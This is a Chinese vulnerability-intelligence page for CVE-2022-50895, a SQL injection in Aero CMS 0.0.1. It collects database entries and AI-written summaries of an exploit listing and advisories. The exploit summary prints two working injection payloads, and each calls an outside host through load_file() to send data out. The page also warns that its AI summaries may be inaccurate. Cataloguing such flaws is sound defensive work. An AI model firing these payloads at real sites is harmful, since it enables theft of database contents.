支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2022-50895 基础信息
漏洞信息
                                        # Aero CMS 0.0.1 SQL注入漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Aero CMS 0.0.1 - SQL Injection
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Aero CMS 0.0.1 contains a SQL injection vulnerability in the author parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, time-based, and UNION query techniques to extract sensitive database information and potentially compromise the system.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
SQL命令中使用的特殊元素转义处理不恰当(SQL注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
Aero CMS SQL注入漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Aero CMS是美国Aero CMS公司的一个内容管理系统。 Aero CMS 0.0.1版本存在SQL注入漏洞,该漏洞源于author参数存在SQL注入漏洞,可能导致提取敏感数据库信息。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
SQL注入
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50895 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2022-50895 的情报信息
  • 标题: Aero CMS v0.0.1 - SQLi - PHP webapps Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ## 关键信息
    
    - **漏洞名称:** Aero CMS v0.0.1 - SQLi
    - **EDB-ID:** 51022
    - **CVE:** N/A
    - **作者:** nu11secur1ty
    - **类型:** WEBAPPS
    - **平台:** PHP
    - **发布日期:** 2022-09-23
    - **易受攻击的应用:** MegaTKC/AeroCMS v0.0.1
    - **漏洞描述:** AeroCMS-v0.0.1 CMS系统中的`author`参数存在SQL注入漏洞,攻击者可以利用此漏洞转储数据库,进行各种恶意操作。
    - **漏洞级别:** 高危
    
    ## Payload 示例
    
    - **基于时间的盲注**
      - **Payload:** 
        ```sql
        author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwlN'='mwLN&p_id=4
        ```
    - **UNION查询**
      - **Payload:** 
        ```sql
        author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d649434f644662587149734b6d517a4e674f5471615a73616d6f58,0x7170716b71),NULL,N...
        ```
    
    ## 参考链接
    - Vendor: https://github.com/MegaTKC
    - Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
    - Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
                                            
    Aero CMS v0.0.1 - SQLi - PHP webapps Exploit
  • 标题: CVE-nu11secur1ty/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub -- 🔗来源链接

    标签:technical-description

    神龙速读:
                                            ### 关键信息
    
    1. **漏洞描述**
        - **漏洞**: AeroCMS-v0.0.1 存在SQL注入漏洞。
        - **受影响参数**: `author` 参数(通过GET请求提交)。
        - **POC (Proof of Concept)**: 
            - 一类 SQL 注入类型是布尔型盲注(将抛异常替换为报错返回值)。
            - 更多其他类型利用样例亦存在,如 `author='admin'+…`.
    
    2. **漏洞类型**
        - **SQL注入漏洞**
            - 存在多种绕过方式:如盲注、基于错误注入、时间延迟注入等。
        - **风险等级**: 高危(恶意用户可以直接操作数据库)。
        - **父组织**: 在`vendors`中,本漏洞针对的是AeroCMS制作的<a>其版本号是v0.0.1</a>。还有其他不同项目同时可结核例如`ANEJmmm`, `DHCP`等
        - **安全影响**: 黑客可以利用该漏洞进行数据库信息窃取,造成数据泄露。
    
    3. **修复/防御建议**
        - 未直接列出。
        - 可参考SQL注入一般防御手段:如输入参数过滤、使用预编译语句等。
    
    4. **额外资源**
        - [Reproduce](href)
        - [Proof and Exploit](href)
                                            
    CVE-nu11secur1ty/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub
  • 标题: GitHub - MegaTKC/AeroCMS: Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications! -- 🔗来源链接

    标签:product

    神龙速读:
                                            ### 关键信息
    - **项目主页**: 该截图来自GitHub,显示的是MegaTKC下名为AeroCMS的项目页面,表明这是一个开源的CMS(内容管理系统)项目。
    - **项目更新**: 最后一次提交在截图中显示为10小时前,且最近的改动是“Add Discord Server Link”,由MegaTKC提交,这表明项目仍在维护中。
    - **项目状态**: 该项目只有1个分支和1个标签,且尚未发布任何版本,这可能意味着项目处于早期开发阶段或维护更新不活跃。
    - **项目语言**: AeroCMS主要使用JavaScript(67.4%)和PHP(30.9%)编写,使用了OOP PHP,这可能是对其安全性和功能扩展性的潜在风险点,因为如果编码不当,OOP PHP应用可能面临各类注入、权限提升等安全问题。
    - **潜在风险**: 由于截图中没有显示项目的代码内容或安全措施的细节,仅凭此信息无法直接判断具体漏洞,但根据项目语言和技术栈,可以推测潜在的安全风险如XSS、SQL注入、 CSRF等,这些常见于web应用中,尤其是对于中小型CMS系统。
    - **环境依赖**: 项目依赖于PHP 5.6 - PHP 7.4、MySQL或MariaDB数据库、Apache2服务器,这些信息对进行相关漏洞分析很有帮助,因为不同版本的PHP和数据库可能存在已知漏洞。同时,项目支持使用XAMPP服务器,这为快速搭建测试环境提供了便利,也意味着开发和测试过程中可能的配置不当和默认设置可能导致安全风险。
                                            
    GitHub - MegaTKC/AeroCMS: Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications!
  • 标题: Aero CMS 0.0.1 - SQL Injection | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            ### 关键信息
    
    - **漏洞名称:** Aero CMS 0.0.1 - SQL Injection
    - **严重性:** HIGH
    - **日期:** January 13, 2026
    - **影响版本:** Aero CMS 0.0.1
    - **CVE编号:** CVE-2022-50895
    - **漏洞描述:** Aero CMS 0.0.1 在 `author` 参数中存在SQL注入漏洞,允许攻击者操纵数据库查询。攻击者可以利用布尔型、错误型、时间型和UNION查询技术来提取敏感的数据库信息,可能危及系统安全。
    - **参考资料:**
      - ExploitDB-51022
      - Archived AeroCMS GitHub Repository
      - Vulnerability Research Repository
    - **提交者:** nu11secur1ty
                                            
    Aero CMS 0.0.1 - SQL Injection | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50895
四、漏洞 CVE-2022-50895 的评论
匿名用户
2026-01-15 06:09:08

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论